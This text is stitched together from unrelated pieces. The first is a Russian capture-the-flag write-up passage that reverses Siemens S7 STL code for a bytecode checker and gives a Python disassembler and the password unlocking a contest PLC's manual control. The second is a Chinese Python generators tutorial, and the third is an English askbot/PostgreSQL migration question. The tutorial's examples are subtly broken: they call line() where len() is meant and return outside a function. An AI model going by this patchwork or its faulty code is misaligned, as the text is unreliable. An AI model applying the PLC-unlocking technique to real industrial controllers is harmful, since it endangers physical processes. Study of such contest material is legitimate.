[AR2,P#0.0] OW L #TEMP12 AW T B [AR1,P#0.0] L DW#16#0 T #TEMP0 L MB 101 T #TEMP1 L MB 102 T #TEMP2 L #TEMP4 LAR1 JU M006M011: +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP8 L P#M 100.0 LAR2 L #TEMP8 L C#8 *I +AR2 TAR2 #TEMP10 TAR1 #TEMP4 LAR1 #TEMP9 LAR2 #TEMP10 L B [AR1,P#0.0] L B [AR2,P#0.0] -I T B [AR1,P#0.0] L DW#16#0 T #TEMP0 L MB 101 T #TEMP1 L MB 102 T #TEMP2 L #TEMP4 LAR1 JU M006M012: L #TEMP15 INC 1 T #TEMP15 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP7 L P#M 100.0 LAR2 L #TEMP7 L C#8 *I +AR2 TAR2 #TEMP9 +AR1 P#1.0 L B [AR1,P#0.0] T #TEMP8 L P#M 100.0 LAR2 L #TEMP8 L C#8 *I +AR2 TAR2 #TEMP10 TAR1 #TEMP4 LAR1 #TEMP9 LAR2 #TEMP10 L B [AR1,P#0.0] L B [AR2,P#0.0] ==I JCN M013 JU M014M013: L P#DBX 0.0 LAR1 T #TEMP4 L B#16#0 T #TEMP6 JU M006M014: L #TEMP4 LAR1 L #TEMP13 L L#1 +I T #TEMP13 JU M006M006: L #TEMP0 T MB 100 L #TEMP1 T MB 101 L #TEMP2 T MB 102 +AR1 P#1.0 L #TEMP6 + 1 T #TEMP6 JU M005M010: L P#DBX 0.0 LAR1 L 0 T #TEMP6 TAR1 #TEMP4M005: TAR1 #TEMP4 CLR = #TEMP16 L #TEMP13 L L#20 ==I S #TEMP16 L #TEMP15 ==I A #TEMP16 JC M017 L #TEMP13 L L#20 <I S #TEMP16 L #TEMP15 ==I A #TEMP16 JC M018 JU M019M017: SET = #TEMP14 JU M016M018: CLR = #TEMP14 JU M016M019: CLR O #TEMP14 = #RET_VAL JU M015M016: CLR O #TEMP14 = #RET_VAL
Код довольно объемный и человеку, незнакомому с STL, может показаться сложным. Разбирать каждую инструкцию в рамках данной статьи нет смысла, подробно с инструкциями и возможностями языка STL можно ознакомиться в соответствующем мануале: Statement List (STL) for S7-300 and S7-400 Programming. Здесь я приведу тот же самый код после обработки — переименования меток и переменных и добавления комментариев, описывающих алгоритм работы и некоторые конструкции языка STL. Сразу отмечу, что в рассматриваемом блоке реализована виртуальная машина, исполняющая некоторый байт-код, находящийся в блоке DB100, содержимое которого нам известно. Инструкции виртуальной машины представляют собой 1 байт операционного кода и байты аргументов, по одному байту на каждый аргумент. Все рассмотренные инструкции имеют по два аргумента, их значения в комментариях я обозначил как X и Y.
Код после обработки
]
# Инициализация различных переменных
L B#16#0
T #CHECK_N # Счетчик успешно пройденных проверок
T #COUNTER_N # Счетчик общего количества проверок
L P#DBX 0.0
T #POINTER # Указатель на текущую инструкцию
CLR
= #PRE_RET_VAL
# Основной цикл работы интерпретатора байт-кода
LOOP: L #POINTER
LAR1
OPN DB 100
L DBLG
TAR1
<=D # Проверка выхода указателя за пределы программы
JC FINISH
L DW#16#0
T #REG0
L #TEMP6
L W#16#0
<>I
JC M00d
L P#DBX 0.0
LAR1
# Конструкция switch - case для обработки различных опкодов
M00d: L B [AR1,P#0.0]
T #OPCODE
L W#16#1
==I
JC OPCODE_1
L #OPCODE
L W#16#2
==I
JC OPCODE_2
L #OPCODE
L W#16#3
==I
JC OPCODE_3
L #OPCODE
L W#16#4
==I
JC OPCODE_4
L #OPCODE
L W#16#5
==I
JC OPCODE_5
L #OPCODE
L W#16#6
==I
JC OPCODE_6
JU OPCODE_OTHER
# Обработчик опкода 01: загрузка значения из DB101[X] в регистр Y
# OP01(X, Y): REG[Y] = DB101[X]
OPCODE_1: +AR1 P#1.0
L P#DBX 0.0
LAR2
L B [AR1,P#0.0] # Загрузка аргумента X (индекс в DB101)
L C#8
*I
+AR2
+AR1 P#1.0
L B [AR1,P#0.0] # Загрузка аргумента Y (индекс регистра)
JL M003 # Аналог switch - case на основе значения Y
JU M001 # для выбора необходимого регистра для записи.
JU M002 # Подобные конструкции используются и в других
JU M004 # операциях ниже для аналогичных целей
M003: JU LOOPEND
M001: OPN DB 101
L B [AR2,P#0.0]
T #REG0 # Запись значения DB101[X] в REG[0]
JU PRE_LOOPEND
M002: OPN DB 101
L B [AR2,P#0.0]
T #REG1 # Запись значения DB101[X] в REG[1]
JU PRE_LOOPEND
M004: OPN DB 101
L B [AR2,P#0.0]
T #REG2 # Запись значения DB101[X] в REG[2]
JU PRE_LOOPEND
# Обработчик опкода 02: загрузка значения X в регистр Y
# OP02(X, Y): REG[Y] = X
OPCODE_2: +AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP3
+AR1 P#1.0
L B [AR1,P#0.0]
JL M009
JU M00b
JU M00a
JU M00c
M009: JU LOOPEND
M00b: L #TEMP3
T #REG0
JU PRE_LOOPEND
M00a: L #TEMP3
T #REG1
JU PRE_LOOPEND
M00c: L #TEMP3
T #REG2
JU PRE_LOOPEND
# Опкод 03 не используется в программе, поэтому пропустим его
...
# Обработчик опкода 04: сравнение регистров X и Y
# OP04(X, Y): REG[0] = 0; REG[X] = (REG[X] == REG[Y])
OPCODE_4: +AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP7 # первый аргумент - X
L P#M 100.0
LAR2
L #TEMP7
L C#8
*I
+AR2
TAR2 #TEMP9 # REG[X]
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP8
L P#M 100.0
LAR2
L #TEMP8
L C#8
*I
+AR2
TAR2 #TEMP10 # REG[Y]
TAR1 #POINTER
LAR1 #TEMP9 # REG[X]
LAR2 #TEMP10 # REG[Y]
L B [AR1,P#0.0]
L B [AR2,P#0.0]
AW
INVI
T #TEMP12 # ~(REG[Y] & REG[X])
L B [AR1,P#0.0]
L B [AR2,P#0.0]
OW
L #TEMP12
AW # (~(REG[Y] & REG[X])) & (REG[Y] | REG[X]) - аналог проверки на равенство
T B [AR1,P#0.0]
L DW#16#0
T #REG0
L MB 101
T #REG1
L MB 102
T #REG2
L #POINTER
LAR1
JU PRE_LOOPEND
# Обработчик опкода 05: вычитание регистра Y из X
# OP05(X, Y): REG[0] = 0; REG[X] = REG[X] - REG[Y]
OPCODE_5: +AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP7
L P#M 100.0
LAR2
L #TEMP7
L C#8
*I
+AR2
TAR2 #TEMP9 # REG[X]
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP8
L P#M 100.0
LAR2
L #TEMP8
L C#8
*I
+AR2
TAR2 #TEMP10 # REG[Y]
TAR1 #POINTER
LAR1 #TEMP9
LAR2 #TEMP10
L B [AR1,P#0.0]
L B [AR2,P#0.0]
-I # ACCU1 = ACCU2 - ACCU1, REG[X] - REG[Y]
T B [AR1,P#0.0]
L DW#16#0
T #REG0
L MB 101
T #REG1
L MB 102
T #REG2
L #POINTER
LAR1
JU PRE_LOOPEND
# Обработчик опкода 06: инкремент #CHECK_N при равенстве регистров X и Y
# OP06(X, Y): #CHECK_N += (1 if REG[X] == REG[Y] else 0)
OPCODE_6: L #COUNTER_N
INC 1
T #COUNTER_N
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP7 # REG[X]
L P#M 100.0
LAR2
L #TEMP7
L C#8
*I
+AR2
TAR2 #TEMP9 # REG[X]
+AR1 P#1.0
L B [AR1,P#0.0]
T #TEMP8
L P#M 100.0
LAR2
L #TEMP8
L C#8
*I
+AR2
TAR2 #TEMP10 # REG[Y]
TAR1 #POINTER
LAR1 #TEMP9 # REG[Y]
LAR2 #TEMP10 # REG[X]
L B [AR1,P#0.0]
L B [AR2,P#0.0]
==I
JCN M013
JU M014
M013: L P#DBX 0.0
LAR1
T #POINTER
L B#16#0
T #TEMP6
JU PRE_LOOPEND
M014: L #POINTER
LAR1
# Инкремент значения #CHECK_N
L #CHECK_N
L L#1
+I
T #CHECK_N
JU PRE_LOOPEND
PRE_LOOPEND: L #REG0
T MB 100
L #REG1
T MB 101
L #REG2
T MB 102
+AR1 P#1.0
L #TEMP6
+ 1
T #TEMP6
JU LOOPEND
OPCODE_OTHER: L P#DBX 0.0
LAR1
L 0
T #TEMP6
TAR1 #POINTER
LOOPEND: TAR1 #POINTER
CLR
= #TEMP16
L #CHECK_N
L L#20
==I
S #TEMP16
L #COUNTER_N
==I
A #TEMP16
# Все проверки пройдены, если #CHECK_N == #COUNTER_N == 20
JC GOOD
L #CHECK_N
L L#20
<I
S #TEMP16
L #COUNTER_N
==I
A #TEMP16
JC FAIL
JU M019
GOOD: SET
= #PRE_RET_VAL
JU FINISH
FAIL: CLR
= #PRE_RET_VAL
JU FINISH
M019: CLR
O #PRE_RET_VAL
= #RET_VAL
JU LOOP
FINISH: CLR
O #PRE_RET_VAL
= #RET_VAL
Получив представление об инструкциях виртуальной машины, напишем небольшой дизассемблер для разбора байт-кода в блоке DB100:
import string
alph = string.ascii_letters + string.digits
with open('DB100.bin', 'rb') as f:
m = f.read()
pc = 0
while pc < len(m):
op = m[pc]
if op == 1:
print('R{} = DB101[{}]'.format(m[pc + 2], m[pc + 1]))
pc += 3
elif op == 2:
c = chr(m[pc + 1])
c = c if c in alph else '?'
print('R{} = {:02x} ({})'.format(m[pc + 2], m[pc + 1], c))
pc += 3
elif op == 4:
print('R0 = 0; R{} = (R{} == R{})'.format(
m[pc + 1], m[pc + 1], m[pc + 2]))
pc += 3
elif op == 5:
print('R0 = 0; R{} = R{} - R{}'.format(
m[pc + 1], m[pc + 1], m[pc + 2]))
pc += 3
elif op == 6:
print('CHECK (R{} == R{})\n'.format(
m[pc + 1], m[pc + 2]))
pc += 3
else:
print('unk opcode {}'.format(op))
break
В результате получим следующий код виртуальной машины:
Код виртуальной машины
R1 = DB101[0]
R2 = 6e (n)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[1]
R2 = 10 (?)
R0 = 0; R1 = R1 - R2
R2 = 20 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[2]
R2 = 77 (w)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[3]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[4]
R2 = 75 (u)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[5]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[6]
R2 = 34 (4)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[7]
R2 = 26 (?)
R0 = 0; R1 = R1 - R2
R2 = 4c (L)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[8]
R2 = 33 (3)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[9]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[10]
R2 = 37 (7)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[11]
R2 = 22 (?)
R0 = 0; R1 = R1 - R2
R2 = 46 (F)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[12]
R2 = 33 (3)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[13]
R2 = 0a (?)
R0 = 0; R1 = R1 - R2
R2 = 16 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[14]
R2 = 6d (m)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[15]
R2 = 11 (?)
R0 = 0; R1 = R1 - R2
R2 = 23 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[16]
R2 = 35 (5)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[17]
R2 = 12 (?)
R0 = 0; R1 = R1 - R2
R2 = 25 (?)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
R1 = DB101[18]
R2 = 33 (3)
R0 = 0; R1 = (R1 == R2)
CHECK (R1 == R0)
R1 = DB101[19]
R2 = 26 (?)
R0 = 0; R1 = R1 - R2
R2 = 4c (L)
R0 = 0; R1 = R1 - R2
CHECK (R1 == R0)
Как видно, данная программа просто проверяет каждый символ из DB101 на равенство определенному значению. Итоговая строка для прохождения всех проверок: n0w u 4r3 7h3 m4573r. Если данную строку поместить в блок DB101, то активируется ручное управление ПЛК и можно будет взорвать или сдуть воздушный шар.
Вот и все! Алексей продемонстрировал высокий уровень знаний, достойный индустриального ниндзя :) Победителю мы отправили памятные призы. Большое спасибо всем участникам!
|
带有 yield 关键字的的函数在 Python 中被称之为 generator(生成器)。Python 解释器会将带有 yield 关键字的函数视为一个 generator 来处理。一个函数或者子程序都只能 return 一次,但是一个生成器能暂停执行并返回一个中间的结果 —— 这就是 yield 语句的功能 : 返回一个中间值给调用者并暂停执行。
EXAMPLE:
In [94]: def fab(max): ...: n, a, b = 0, 0, 1 ...: while n < max: ...: yield b ...: a, b = b, a + b ...: n = n + 1 ...: In [95]: f = fab(5) In [96]: f.next() Out[96]: 1 In [97]: f.next() Out[97]: 1 In [98]: f.next() Out[98]: 2 In [99]: f.next() Out[99]: 3 In [100]: f.next() Out[100]: 5 In [101]: f.next() --------------------------------------------------------------------------- StopIteration Traceback (most recent call last)in() ----> 1 f.next() StopIteration:
fab() 的执行过程
执行语句 f = fab(5) 时,并不会马上执行 fab() 函数的代码块,而是首先返回一个 iterable 对象!
在 for 循环语句执行时,才会执行 fab() 函数的代码块。
执行到语句 yield b 时,fab() 函数会返回一个迭代值,直到下次迭代前,程序流会回到 yield b 的下一条语句继续执行,然后再次回到 for 循环,如此迭代直到结束。看起来就好像一个函数在正常执行的过程中被 yield 中断了数次,每次中断都会通过 yield 返回当前的迭代值。
由此可以看出,生成器通过关键字 yield 不断的将迭代器返回到内存进行处理,而不会一次性的将对象全部放入内存,从而节省内存空间。从这点看来生成器和迭代器非常相似,但如果更深入的了解的话,其实两者仍存在区别。
生成器和迭代器的区别
生成器的另一个优点就是它不要求你事先准备好整个迭代过程中所有的元素,即无须将对象的所有元素都存入内存之后,才开始进行操作。生成器仅在迭代至某个元素时才会将该元素放入内存,而在这之前或之后,元素可以不存在或者被销毁。这个特点使得它特别适合用于遍历一些巨大的或是无限的类序列对象,EG. 大文件/大集合/大字典/斐波那契数列等。这个特点被称为 延迟计算 或 惰性求值(Lazy evaluation),可以有效的节省内存。惰性求值实际上是现实了协同程序 的思想。
协同程序:是一个可以独立运行的函数调用,该调用可以被暂停或者挂起,之后还能够从程序流挂起的地方继续或重新开始。当协同程序被挂起时,Python 就能够从该协同程序中获取一个处于中间状态的属性的返回值(由 yield 返回),当调用 next() 方法使得程序流回到协同程序中时,能够为其传入额外的或者是被改变了的参数,并且从上次挂起的下一条语句继续执行。这是一种类似于进程中断的函数调用方式。这种挂起函数调用并在返回属性中间值后,仍然能够多次继续执行的协同程序被称之为生成器。
NOTE:而迭代器是不具有上述的特性的,不适合去处理一些巨大的类序列对象,所以建议优先考虑使用生成器来处理迭代的场景。
生成器的优势
综上所述:使用生成器最好的场景就是当你需要以迭代的方式去穿越一个巨大的数据集合。比如:一个巨大的文件/一个复杂的数据库查询等。
EXAMPLE 2:读取一个大文件
def read_file(fpath):
BLOCK_SIZE = 1024
with open(fpath, 'rb') as f:
while True:
block = f.read(BLOCK_SIZE)
if block:
yield block
else:
return
如果直接对文件对象调用 read() 方法,会导致不可预测的内存占用。好的方法是利用固定长度的缓冲区来不断读取文件的部分内容。通过 yield,我们不再需要编写读文件的迭代类,就可以轻松实现文件读取。
加强的生成器特性
除了可以使用 next() 方法来获取下一个生成的值,用户还可以使用 send() 方法将一个新的或者是被修改的值返回给生成器。除此之外,还可以使用 close() 方法来随时退出生成器。
EXAMPLE 3:
In [5]: def counter(start_at=0):
...: count = start_at
...: while True:
...: val = (yield count)
...: if val is not None:
...: count = val
...: else:
...: count += 1
...:
In [6]: count = counter(5)
In [7]: type(count)
Out[7]: generator
In [8]: count.next()
Out[8]: 5
In [9]: count.next()
Out[9]: 6
In [10]: count.send(9) # 返回一个新的值给生成器中的 yield count
Out[10]: 9
In [11]: count.next()
Out[11]: 10
In [12]: count.close() # 关闭一个生成器
In [13]: count.next()
---------------------------------------------------------------------------
StopIteration Traceback (most recent call last)
in ()
----> 1 count.next()
StopIteration:
生成器表达式
生成器表达式是列表解析的扩展,就如上文所述:生成器是一个特定的函数,允许返回一个中间值,然后挂起代码的执行,稍后再恢复执行。列表解析的不足在于,它必须一次性生成所有的数据,用以创建列表对象,所以不适用于迭代大量的数据。
生成器表达式通过结合列表解析和生成器来解决这个问题。
列表解析
[expr for iter_var in iterable if cond_expr]
生成器表达式
(expr for iter_var in iterable if cond_expr)
两者的语法非常相似,但生成器表达式返回的不是一个列表类型对象,而是一个生成器对象,生成器是一个内存使用友好的结构。
生成器表达式样例
通过改进查找文件中最长的行的功能实现来看看生成器的优势。
EXAMPLE 4 : 一个比较通常的方法,通过循环将更长的行赋值给变量 longest 。
f = open('FILENAME', 'r')
longest = 0
while True:
linelen = len(f.readline().strip())
if not linelen:
break
if linelen > longest:
longest = linelen
f.close()
return longest
很明显的,在这里例子中,需要迭代的对象是一个文件对象。
改进 1:
需要注意的是,如果我们读取一个文件所有的行,那么我们应该尽早的去释放这个文件资源。例如:一个日志文件,会有很多不同的进程会其进行操作,所以我们不能容忍任意一个进程拿着这个文件的句柄不放。
f = open('FILENAME', 'r')
longest = 0
allLines = f.readlines()
f.close()
for line in allLines:
linelen = len(line.strip())
if not linelen:
break
if linelen > longest:
longest = linelen
return longest
改进 2:
我们可以使用列表解析来简化上述的代码,例如:在得到 allLines 所有行的列表时对每一行都进行处理。
f = open('FILENAME', 'r')
longest = 0
allLines = [x.strip() for x in f.readlines()]
f.close()
for line in allLines:
linelen = len(line)
if not linelen:
break
if linelen > longest:
longest = linelen
return longest
改进 3:
当我们处理一个巨大的文件时,file.readlines() 并不是一个明智的选择,因为 readlines() 会读取文件中所有的行。那么我们是否有别的方法来获取所有行的列表呢?我们可以应用 file 文件内置的迭代器。
f = open('FILENAME', 'r')
allLinesLen = [line(x.strip()) for x in f]
f.close()
return max(allLinesLen) # 返回列表中最大的数值
不再需要使用循环比较并保留当前最大值的方法来处理,将所有行的长度最后元素存放在列表对象中,再获取做大的值即可。
改进 4:
这里仍然存在一个问题,就是使用列表解析来处理 file 对象时,会将 file 所有的行都读取到内存中,然后再创建一个新的列表对象,这是一个内存不友好的实现方式。那么,我们就可以使用生成器表达式来替代列表解析。
f = open('FILENAME', 'r')
allLinesLen = (line(x.strip()) for x in f) # 这里的 x 相当于 yield x
f.close()
return max(allLinesLen)
因为如果在函数中使用生成器表达式作为参数时,我们可以忽略括号 ‘()’,所以还能够进一步简化代码:
f = open('FILENAME', 'r')
longest = max(line(x.strip()) for x in f)
f.close()
return longest
最后:我们能够以一行代码实现这个功能,让 Python 解析器去处理打开的文件。
当然并不是说代码越少就越好,例如下面这一行代码每循环一次就会调用一个 open() 函数,效率上并没有 改进 4 更高。
return max(line(x.strip()) for x in open('FILENAME'))
小结
在需要迭代穿越一个对象时,我们应该优先考虑使用生成器替代迭代器,使用生成器表达式替代列表解析。当然这并不是绝对的。 迭代器和生成器是 Python 很重要的特性,对其有很好的理解能够写出更加 Pythonic 的代码。
|
Getting transaction errors in Postgresql migrations
I try to install askbot as a pluggable app in my django project. It seems to work but when I run
python manage.py migrate
or
python manage.py test askbot
I have the following error
...
File "/home/leo/Bureau/pic-13-geotopic/trunk/developpement/I/projetGeoForum/askbot/migrations/0161_add_field__user_languages.py", line 14, in forwards
keep_default=False)
File "/usr/lib/python2.7/dist-packages/south/db/generic.py", line 282, in add_column
self.execute(sql)
File "/usr/lib/python2.7/dist-packages/south/db/generic.py", line 150, in execute
cursor.execute(sql, params)
File "/usr/local/lib/python2.7/dist-packages/django/db/backends/postgresql_psycopg2/base.py", line 52, in execute
return self.cursor.execute(query, args)
django.db.utils.DatabaseError: column "languages" of relation "auth_user" already exists
I haven't changed any code in the askbot app. I think I have well merged the settings.py. Askbot success accessing the database.
I'm using postgreSQL 9.1.8 and psycopg2 2.4.5
Please do not hesitate if you want more information.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.